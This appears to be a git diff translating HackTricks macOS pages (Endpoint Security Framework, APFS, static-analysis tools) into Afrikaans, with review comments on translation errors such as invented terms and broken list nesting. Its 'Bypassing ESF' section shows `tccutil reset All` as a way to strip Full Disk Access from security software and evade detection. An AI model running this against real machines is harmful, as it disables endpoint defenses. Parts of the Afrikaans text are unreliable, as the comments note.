[**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## System Extensions / Endpoint Security Framework +## Stelseluitbreidings / Eindpuntsekuriteitsraamwerk -Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction. +In teenstelling met Kernel-uitbreidings, **loop stelseluitbreidings in gebruikersruimte** in plaas van die kernruimte, wat die risiko van 'n stelselcrash as gevolg van uitbreidingsfoute verminder.
https://knight.sc/images/system-extension-internals-1.png
-There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions. +Daar is drie tipes stelseluitbreidings: **DriverKit**-uitbreidings, **Netwerk**-uitbreidings en **Eindpuntsekuriteit**-uitbreidings. -### **DriverKit Extensions** +### **DriverKit-uitbreidings** -DriverKit is a replacement for kernel extensions that **provide hardware support**. It allows device drivers (like USB, Serial, NIC, and HID drivers) to run in user space rather than kernel space. The DriverKit framework includes **user space versions of certain I/O Kit classes**, and the kernel forwards normal I/O Kit events to user space, offering a safer environment for these drivers to run. +DriverKit is 'n vervanging vir kernuitbreidings wat **hardwaresondersteuning bied**. Dit maak dit moontlik dat toestuurprogramme (soos USB-, Seriële-, NIC- en HID-toestuurprogramme) in gebruikersruimte in plaas van kernruimte loop. Die DriverKit-raamwerk sluit **gebruikersruimte-weergawes van sekere I/O Kit-klasse** in, en die kern stuur normale I/O Kit-gebeure na gebruikersruimte, wat 'n veiliger omgewing bied vir hierdie toestuurprogramme om in te loop. -### **Network Extensions** +### **Netwerkuitbreidings** -Network Extensions provide the ability to customize network behaviors. There are several types of Network Extensions: +Netwerkuitbreidings bied die vermoë om netwerkgedrag aan te pas. Daar is verskeie tipes netwerkuitbreidings: -* **App Proxy**: This is used for creating a VPN client that implements a flow-oriented, custom VPN protocol. This means it handles network traffic based on connections (or flows) rather than individual packets. -* **Packet Tunnel**: This is used for creating a VPN client that implements a packet-oriented, custom VPN protocol. This means it handles network traffic based on individual packets. -* **Filter Data**: This is used for filtering network "flows". It can monitor or modify network data at the flow level. 
-* **Filter Packet**: This is used for filtering individual network packets. It can monitor or modify network data at the packet level. -* **DNS Proxy**: This is used for creating a custom DNS provider. It can be used to monitor or modify DNS requests and responses. +* **App Proxy**: Dit word gebruik om 'n VPN-kliënt te skep wat 'n vloeigeoriënteerde, aangepaste VPN-protokol implementeer. Dit beteken dit hanteer netwerkverkeer op grond van verbindings (of vloeie) eerder as individuele pakkies. +* **Pakkettunnel**: Dit word gebruik om 'n VPN-kliënt te skep wat 'n pakketgeoriënteerde, aangepaste VPN-protokol implementeer. Dit beteken dit hanteer netwerkverkeer op grond van individuele pakkies. +* **Filterdata**: Dit word gebruik om netwerk "vloeie" te filter. Dit kan netwerkdata op vloeivlak monitor of wysig. +* **Filterpakkie**: Dit word gebruik om individuele netwerkpakkies te filter. Dit kan netwerkdata op pakkievlak monitor of wysig. +* **DNS Proxy**: Dit word gebruik om 'n aangepaste DNS-verskaffer te skep. Dit kan gebruik word om DNS-versoeke en -antwoorde te monitor of wysig. -## Endpoint Security Framework +## Eindpuntsekuriteitsraamwerk -Endpoint Security is a framework provided by Apple in macOS that provides a set of APIs for system security. It's intended for use by **security vendors and developers to build products that can monitor and control system activity** to identify and protect against malicious activity. +Eindpuntsekuriteit is 'n raamwerk wat deur Apple in macOS voorsien word en 'n stel API's bied vir stelselsekuriteit. Dit is bedoel vir gebruik deur **sekuriteitsvennote en ontwikkelaars om produkte te bou wat stelselaktiwiteit kan monitor en beheer** om kwaadwillige aktiwiteit te identifiseer en te beskerm daarteen. -This framework provides a **collection of APIs to monitor and control system activity**, such as process executions, file system events, network and kernel events. 
+Hierdie raamwerk bied 'n **versameling API's om stelselaktiwiteit te monitor en te beheer**, soos prosesuitvoerings, lêersisteemgebeure, netwerk- en kerngebeure. -The core of this framework is implemented in the kernel, as a Kernel Extension (KEXT) located at **`/System/Library/Extensions/EndpointSecurity.kext`**. This KEXT is made up of several key components: +Die kern van hierdie raamwerk word geïmplementeer in die kern as 'n Kernel-uitbreiding (KEXT) wat geleë is by **`/System/Library/Extensions/EndpointSecurity.kext`**. Hierdie KEXT bestaan uit verskeie sleutelkomponente: -* **EndpointSecurityDriver**: This acts as the "entry point" for the kernel extension. It's the main point of interaction between the OS and the Endpoint Security framework. -* **EndpointSecurityEventManager**: This component is responsible for implementing kernel hooks. Kernel hooks allow the framework to monitor system events by intercepting system calls. -* **EndpointSecurityClientManager**: This manages the communication with user space clients, keeping track of which clients are connected and need to receive event notifications. -* **EndpointSecurityMessageManager**: This sends messages and event notifications to user space clients. +* **EndpointSecurityDriver**: Dit tree op as die "toegangspunt" vir die kernuitbreiding. Dit is die hoofpunt van interaksie tussen die bedryfstelsel en die Eindpuntsekuriteitsraamwerk. +* **EndpointSecurityEventManager**: Hierdie komponent is verantwoordelik vir die implementering van kernhake. Kernhake maak dit moontlik vir die raamwerk om stelselgebeure te monitor deur stelseloproepe te onderskep. +* **EndpointSecurityClientManager**: Dit bestuur die kommunikasie met kliënte in gebruikersruimte, hou by watter kliënte gekoppel is en kennis moet neem van gebeurteniskennisgewings. +* **EndpointSecurityMessageManager**: Dit stuur boodskappe en gebeurteniskennisgewings na kliënte in gebruikersruimte. 
-The events that the Endpoint Security framework can monitor are categorized into: +Die gebeure wat die Eindpuntsekuriteitsraamwerk kan monitor, word gekategoriseer as: -* File events -* Process events -* Socket events -* Kernel events (such as loading/unloading a kernel extension or opening an I/O Kit device) +* Lêergebeure +* Prosessgebeure +* Sokketgebeure +* Kerngebeure (soos die laai/ontlaai van 'n kernuitbreiding of die oopmaak van 'n I/O Kit-toestel) -### Endpoint Security Framework Architecture +### Eindpuntsekuriteitsraamwerkargitektuur
https://www.youtube.com/watch?v=jaVkpM1UqOs
-**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller: +**Kommunikasie in gebruikersruimte** met die Eindpuntsekuriteitsraamwerk vind plaas deur die IOUserClient-klas. Twee verskillende subklasse word gebruik, afhangende van die tipe oproeper: -* **EndpointSecurityDriverClient**: This requires the `com.apple.private.endpoint-security.manager` entitlement, which is only held by the system process `endpointsecurityd`. -* **EndpointSecurityExternalClient**: This requires the `com.apple.developer.endpoint-security.client` entitlement. This would typically be used by third-party security software that needs to interact with the Endpoint Security framework. +* **EndpointSecurityDriverClient**: Dit vereis die `com.apple.private.endpoint-security.manager`-bevoegdheid, wat slegs deur die stelselproses `endpointsecurityd` besit word. +* **EndpointSecurityExternalClient**: Dit vereis die `com.apple.developer.endpoint-security.client`-bevoegdheid. Dit word tipies deur derdeparty-sekuriteitsagteware gebruik wat met die Eindpuntsekuriteitsraamwerk moet kommunikeer. -The Endpoint Security Extensions:**`libEndpointSecurity.dylib`** is the C library that system extensions use to communicate with the kernel. This library uses the I/O Kit (`IOKit`) to communicate with the Endpoint Security KEXT. +Die Eindpuntsekuriteitsuitbreidings:**`libEndpointSecurity.dylib`** is die C-biblioteek wat stelseluitbreidings gebruik om met die kern te kommunikeer. Hierdie biblioteek gebruik die I/O Kit (`IOKit`) om met die Eindpuntsekuriteits-KEXT te kommunikeer. -**`endpointsecurityd`** is a key system daemon involved in managing and launching endpoint security system extensions, particularly during the early boot process. **Only system extensions** marked with **`NSEndpointSecurityEarlyBoot`** in their `Info.plist` file receive this early boot treatment. 
+**`endpointsecurityd`** is 'n belangrike stelseldaemon wat betrokke is by die bestuur en aanstuur van eindpuntsekuriteitstelseluitbreidings, veral gedurende die vroeë opstartproses. Slegs stelseluitbreidings wat in hul `Info.plist`-lêer gemerk is met **`NSEndpointSecurityEarlyBoot`** ontvang hierdie vroeë opstartbehandeling. -Another system daemon, **`sysextd`**, **validates system extensions** and moves them into the proper system locations. It then asks the relevant daemon to load the extension. The **`SystemExtensions.framework`** is responsible for activating and deactivating system extensions. +'n Ander stelseldaemon, **`sysextd`**, **valideer stelseluitbreidings** en skuif hulle na die korrekte stelselposisies. Dit vra dan die relevante daemon om die uitbreiding te laai. Die **`SystemExtensions.framework`** is verantwoordelik vir die aktivering en deaktivering van stelseluitbreidings. -## Bypassing ESF +## Om ESF te omseil -ESF is used by security tools that will try to detect a red teamer, so any information about how this could be avoided sounds interesting. +ESF word deur sekuriteitsgereedskap gebruik wat sal probeer om 'n rooi-spanlid op te spoor, dus enige inligting oor hoe dit vermy kan word, klink interessant. ### CVE-2021-30965 -The thing is that the security application needs to have **Full Disk Access permissions**. So if an attacker could remove that, he could prevent the software from running: - +Die ding is dat die sekuriteitsprogram **Volle Skyskryftoegang-bevoegdhede** moet hê. 
As 'n aanvaller dit kan verwyder, kan hy voorkom dat die sagteware loop: ```bash tccutil reset All ``` +Vir **meer inligting** oor hierdie omseiling en verwante omseilings, kyk na die praatjie [#OBTS v5.0: "The Achilles Heel of EndpointSecurity" - Fitzl Csaba](https://www.youtube.com/watch?v=lQO7tvNCoTI) -For **more information** about this bypass and related ones check the talk [#OBTS v5.0: "The Achilles Heel of EndpointSecurity" - Fitzl Csaba](https://www.youtube.com/watch?v=lQO7tvNCoTI) +Aan die einde is dit reggestel deur die nuwe toestemming **`kTCCServiceEndpointSecurityClient`** aan die sekuriteitsprogram wat deur **`tccd`** bestuur word te gee, sodat `tccutil` nie sy toestemmings sal skoonmaak en dit sal verhoed om uit te voer nie. -At the end this was fixed by giving the new permission **`kTCCServiceEndpointSecurityClient`** to the security app managed by **`tccd`** so `tccutil` won't clear its permissions preventing it from running. - -## References +## Verwysings * [**OBTS v3.0: "Endpoint Security & Insecurity" - Scott Knight**](https://www.youtube.com/watch?v=jaVkpM1UqOs) * [**https://knight.sc/reverse%20engineering/2019/08/24/system-extension-internals.html**](https://knight.sc/reverse%20engineering/2019/08/24/system-extension-internals.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
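Review bot: "**Volle Skyskryftoegang-bevoegdhede**" in the CVE-2021-30965 paragraph is not a recognisable rendering of "Full Disk Access permissions"; "Skyskryftoegang" is not a word, and "Full Disk Access" is the TCC permission's UI label that readers will need to find in System Settings, so keep the English label (e.g. `**Full Disk Access**-toestemmings`, optionally with a gloss) rather than inventing a term. Same paragraph: the blank line the source had between "...kan hy voorkom dat die sagteware loop:" and the ```bash fence is dropped; keep the blank line before fences as in the English original, since that spacing is the repo's convention and some renderers need it.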
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md b/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md index a738a6671..e88907f48 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md @@ -2,43 +2,40 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Apple Propietary File System (APFS) +## Apple Propietary-lêersisteem (APFS) -**Apple File System (APFS)** is a modern file system designed to supersede the Hierarchical File System Plus (HFS+). Its development was driven by the need for **improved performance, security, and efficiency**. +**Apple-lêersisteem (APFS)** is 'n moderne lêersisteem wat ontwerp is om die Hierargiese Lêersisteem Plus (HFS+) te vervang. Die ontwikkeling daarvan is gedryf deur die behoefte aan **verbeterde prestasie, sekuriteit en doeltreffendheid**. -Some notable features of APFS include: +Enkele noemenswaardige kenmerke van APFS sluit in: -1. **Space Sharing**: APFS allows multiple volumes to **share the same underlying free storage** on a single physical device. This enables more efficient space utilization as the volumes can dynamically grow and shrink without the need for manual resizing or repartitioning. - 1. This means, compared with traditional partitions in file disks, **that in APFS different partitions (volumes) shares all the disk space**, while a regular partition usually had a fixed size. -2. **Snapshots**: APFS supports **creating snapshots**, which are **read-only**, point-in-time instances of the file system. Snapshots enable efficient backups and easy system rollbacks, as they consume minimal additional storage and can be quickly created or reverted. -3. **Clones**: APFS can **create file or directory clones that share the same storage** as the original until either the clone or the original file is modified. This feature provides an efficient way to create copies of files or directories without duplicating the storage space. -4. **Encryption**: APFS **natively supports full-disk encryption** as well as per-file and per-directory encryption, enhancing data security across different use cases. -5. 
**Crash Protection**: APFS uses a **copy-on-write metadata scheme that ensures file system consistency** even in cases of sudden power loss or system crashes, reducing the risk of data corruption. - -Overall, APFS offers a more modern, flexible, and efficient file system for Apple devices, with a focus on improved performance, reliability, and security. +1. **Spasie-deling**: APFS maak dit moontlik dat verskeie volumes die **gelyke onderliggende vry stoorplek** op 'n enkele fisiese toestel deel. Dit maak doeltreffender spasiebenutting moontlik, aangesien die volumes dinamies kan groei en krimp sonder die nodigheid van handmatige vergroting of herverdeling. +1. Dit beteken, in vergelyking met tradisionele partisies in lêerdiske, **dat in APFS verskillende partisies (volumes) al die skyfspasie deel**, terwyl 'n gewone partisie gewoonlik 'n vaste grootte gehad het. +2. **Momentopnames**: APFS ondersteun die **skep van momentopnames**, wat **alleen-lees**, punt-in-tyd instansies van die lêersisteem is. Momentopnames maak doeltreffende rugsteun en maklike stelselherstel moontlik, aangesien hulle minimaal bykomende stoorplek gebruik en vinnig geskep of teruggesit kan word. +3. **Klone**: APFS kan **lêer- of gidsklone skep wat dieselfde stoorplek as die oorspronklike deel** totdat óf die kloon óf die oorspronklike lêer gewysig word. Hierdie kenmerk bied 'n doeltreffende manier om kopieë van lêers of gidse te skep sonder om die stoorplek te dupliseer. +4. **Versleuteling**: APFS ondersteun **volledige skyfversleuteling** asook per-lêer en per-gids versleuteling, wat data-sekuriteit in verskillende gevalle verbeter. +5. **Kragonderbrekingbeskerming**: APFS gebruik 'n **kopie-op-skryf metadata-skema wat verseker dat die lêersisteem konsistent bly**, selfs in gevalle van skielike kragonderbreking of stelselonderbrekings, wat die risiko van datakorrupsie verminder. 
+Oor die algemeen bied APFS 'n meer moderne, buigsame en doeltreffende lêersisteem vir Apple-toestelle, met die fokus op verbeterde prestasie, betroubaarheid en sekuriteit. ```bash diskutil list # Get overview of the APFS volumes ``` - ## Firmlinks -The `Data` volume is mounted in **`/System/Volumes/Data`** (you can check this with `diskutil apfs list`). - -The list of firmlinks can be found in the **`/usr/share/firmlinks`** file. +Die `Data` volume is gemonteer in **`/System/Volumes/Data`** (jy kan dit nagaan met `diskutil apfs list`). +Die lys van firmlinks kan gevind word in die **`/usr/share/firmlinks`** lêer. ```bash cat /usr/share/firmlinks /AppleInternal AppleInternal @@ -46,19 +43,18 @@ cat /usr/share/firmlinks /Library Library [...] ``` - -On the **left**, there is the directory path on the **System volume**, and on the **right**, the directory path where it maps on the **Data volume**. So, `/library` --> `/system/Volumes/data/library` +Aan die **linkerkant** is die gidspad op die **Stelselvolume**, en aan die **regterkant** is die gidspad waar dit op die **Datavolume** afbeeld. So, `/library` --> `/system/Volumes/data/library`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
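Review bot: the nested list structure in the APFS feature list is lost: the source had "This means, compared with traditional partitions..." indented as a sub-item under 1. Space Sharing, but `+1. Dit beteken, in vergelyking met tradisionele partisies...` is now at top level, producing two consecutive "1." items before "2."; restore the indentation. While touching the heading, `## Apple Propietary-lêersisteem (APFS)` carries over the source typo "Propietary", and APFS expands to Apple File System (the next line already translates it as "Apple-lêersisteem"), so drop "Propietary" altogether. In the firmlinks paragraph, "`/library` --> `/system/Volumes/data/library`" is inherited from the source with the wrong case; the same hunk gives the mount point as `/System/Volumes/Data` and the listing shows `/Library Library`, so write `/Library` --> `/System/Volumes/Data/Library`. Also "Kragonderbrekingbeskerming" narrows "Crash Protection" to power loss while the sentence itself covers crashes as well.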
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md index 904163ae6..21c603875 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md @@ -1,28 +1,26 @@ -# macOS Apps - Inspecting, debugging and Fuzzing +# macOS-toepassings - Inspekteer, foutopsporing en Fuzzing
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Static Analysis +## Statische Analise ### otool - ```bash otool -L /bin/ls #List dynamically linked libraries otool -tv /bin/ps #Decompile application ``` - ### objdump {% code overflow="wrap" %} @@ -38,8 +36,7 @@ objdump --disassemble-symbols=_hello --x86-asm-syntax=intel toolsdemo #Disassemb ### jtool2 -The tool can be used as a **replacement** for **codesign**, **otool**, and **objdump**, and provides a few additional features. [**Download it here**](http://www.newosxbook.com/tools/jtool.html) or install it with `brew`. - +Die instrument kan gebruik word as 'n **vervanging** vir **codesign**, **otool**, en **objdump**, en bied 'n paar ekstra kenmerke. [**Laai dit hier af**](http://www.newosxbook.com/tools/jtool.html) of installeer dit met `brew`. ```bash # Install brew install --cask jtool2 @@ -56,13 +53,11 @@ ARCH=x86_64 jtool2 --sig /System/Applications/Automator.app/Contents/MacOS/Autom # Get MIG information jtool2 -d __DATA.__const myipc_server | grep MIG ``` - ### Codesign / ldid {% hint style="danger" %} -**`Codesign`** can be found in **macOS** while **`ldid`** can be found in **iOS** +**`Codesign`** kan gevind word in **macOS** terwyl **`ldid`** gevind kan word in **iOS** {% endhint %} - ```bash # Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" 
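Review bot: `## Statische Analise` uses the Dutch/German form; Afrikaans is "Statiese Analise", which also matches the `## Dinamiese Analise` heading used later in this same patch. The blank lines around code fences are removed throughout this region (e.g. the `-` blank between `### otool` and ```bash, the blank after the fence before `### objdump`, and the one before `### Codesign / ldid`); keep the source spacing so the diff only shows translation changes and the fences render consistently. In the title, "Inspekteer, foutopsporing en Fuzzing" mixes a verb with two nouns; "Inspeksie, foutopsporing en fuzzing" reads as a list.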
@@ -89,86 +84,78 @@ ldid -e ## /tmp/entl.xml is a XML file with the new entitlements to add ldid -S/tmp/entl.xml ``` +### VerdagtePakket -### SuspiciousPackage - -[**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html) is a tool useful to inspect **.pkg** files (installers) and see what is inside before installing it.\ -These installers have `preinstall` and `postinstall` bash scripts that malware authors usually abuse to **persist** **the** **malware**. +[**VerdagtePakket**](https://mothersruin.com/software/SuspiciousPackage/get.html) is 'n nuttige hulpmiddel om **.pkg** lêers (installeerders) te ondersoek en te sien wat binne-in is voordat dit geïnstalleer word.\ +Hierdie installeerders het `preinstall` en `postinstall` bash-skripte wat malware-skrywers gewoonlik misbruik om die malware te **volhard**. ### hdiutil -This tool allows to **mount** Apple disk images (**.dmg**) files to inspect them before running anything: - +Hierdie hulpmiddel maak dit moontlik om Apple-diskbeeldlêers (**.dmg**) te **monteer** om dit te ondersoek voordat enige iets uitgevoer word: ```bash hdiutil attach ~/Downloads/Firefox\ 58.0.2.dmg ``` - -It will be mounted in `/Volumes` +Dit sal in `/Volumes` gemonteer word. ### Objective-C #### Metadata {% hint style="danger" %} -Note that programs written in Objective-C **retain** their class declarations **when** **compiled** into [Mach-O binaries](../macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md). Such class declarations **include** the name and type of: +Let daarop dat programme wat in Objective-C geskryf is, hul klassedeclarasies behou wanneer hulle gekompileer word in [Mach-O-binêre](../macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md). 
Sulke klassedeclarasies sluit die naam en tipe van die volgende in: {% endhint %} -* The class -* The class methods -* The class instance variables - -You can get this information using [**class-dump**](https://github.com/nygard/class-dump): +* Die klas +* Die klasmetodes +* Die klasinstansie-variables +Jy kan hierdie inligting kry deur [**class-dump**](https://github.com/nygard/class-dump) te gebruik: ```bash class-dump Kindle.app ``` +Let wel, hierdie name kan versteek word om die omkeer van die binêre kode moeiliker te maak. -Note that this names could be obfuscated to make the reversing of the binary more difficult. +#### Funksie-oproep -#### Function calling - -When a function is called in a binary that uses objective-C, the compiled code instead of calling that function, it will call **`objc_msgSend`**. Which will be calling the final function: +Wanneer 'n funksie in 'n binêre kode geroep word wat Objective-C gebruik, sal die gekompileerde kode in plaas daarvan die funksie **`objc_msgSend`** oproep. Dit sal die finale funksie oproep: ![](<../../../.gitbook/assets/image (560).png>) -The params this function expects are: +Die parameters wat hierdie funksie verwag, is: -* The first parameter (**self**) is "a pointer that points to the **instance of the class that is to receive the message**". Or more simply put, it’s the object that the method is being invoked upon. If the method is a class method, this will be an instance of the class object (as a whole), whereas for an instance method, self will point to an instantiated instance of the class as an object. -* The second parameter, (**op**), is "the selector of the method that handles the message". Again, more simply put, this is just the **name of the method.** -* The remaining parameters are any **values that are required by the method** (op). +* Die eerste parameter (**self**) is " 'n wyser wat wys na die **instansie van die klas wat die boodskap moet ontvang** ". 
Of eenvoudig gestel, dit is die objek waarop die metode aangeroep word. As die metode 'n klasmetode is, sal dit 'n instansie van die klasobjek (as geheel) wees, terwyl dit vir 'n instansiemetode sal wys na 'n geïnstantieerde instansie van die klas as 'n objek. +* Die tweede parameter (**op**) is "die selekteerder van die metode wat die boodskap hanteer". Weereens, eenvoudig gestel, is dit net die **naam van die metode**. +* Die oorblywende parameters is enige **waardes wat deur die metode vereis word** (op). -| **Argument** | **Register** | **(for) objc\_msgSend** | +| **Argument** | **Register** | **(vir) objc\_msgSend** | | ----------------- | --------------------------------------------------------------- | ------------------------------------------------------ | -| **1st argument** | **rdi** | **self: object that the method is being invoked upon** | -| **2nd argument** | **rsi** | **op: name of the method** | -| **3rd argument** | **rdx** | **1st argument to the method** | -| **4th argument** | **rcx** | **2nd argument to the method** | -| **5th argument** | **r8** | **3rd argument to the method** | -| **6th argument** | **r9** | **4th argument to the method** | -| **7th+ argument** |

rsp+
(on the stack)

| **5th+ argument to the method** | +| **1ste argument** | **rdi** | **self: objek waarop die metode aangeroep word** | +| **2de argument** | **rsi** | **op: naam van die metode** | +| **3de argument** | **rdx** | **1ste argument van die metode** | +| **4de argument** | **rcx** | **2de argument van die metode** | +| **5de argument** | **r8** | **3de argument van die metode** | +| **6de argument** | **r9** | **4de argument van die metode** | +| **7de+ argument** |

rsp+
(op die stapel)

